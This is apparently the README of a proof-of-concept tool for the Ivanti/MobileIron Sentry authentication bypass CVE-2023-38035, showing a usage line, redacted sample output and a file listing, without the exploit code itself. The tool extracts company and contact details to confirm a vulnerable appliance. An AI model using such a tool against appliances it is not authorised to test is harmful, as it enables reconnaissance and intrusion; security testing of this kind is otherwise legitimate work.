CVE-2023-38035 Recon oriented exploit, extract company name contact information# MobileIron Sentry CVE-2023-38035 information extraction
## Features
- Extract company name and contact email
- Proof of vulnerability
## Usage
```sh
./sentryexploit 192.168.0.10:8443
2023/08/24 21:29:55 Information extracted, appliance is vulnerable:
2023/08/24 21:29:55 Company: XXXX Ltd., contact: xxx@example.com
```
## Sources
- [Horizon3 deep dive](https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/)
[4.0K] /data/pocs/b7bfd2da3866b4a6b3594a6613601b3a2aac0616
├── [ 294] go.mod
├── [ 67K] go.sum
├── [1.2K] main.go
└── [ 449] README.md
0 directories, 4 files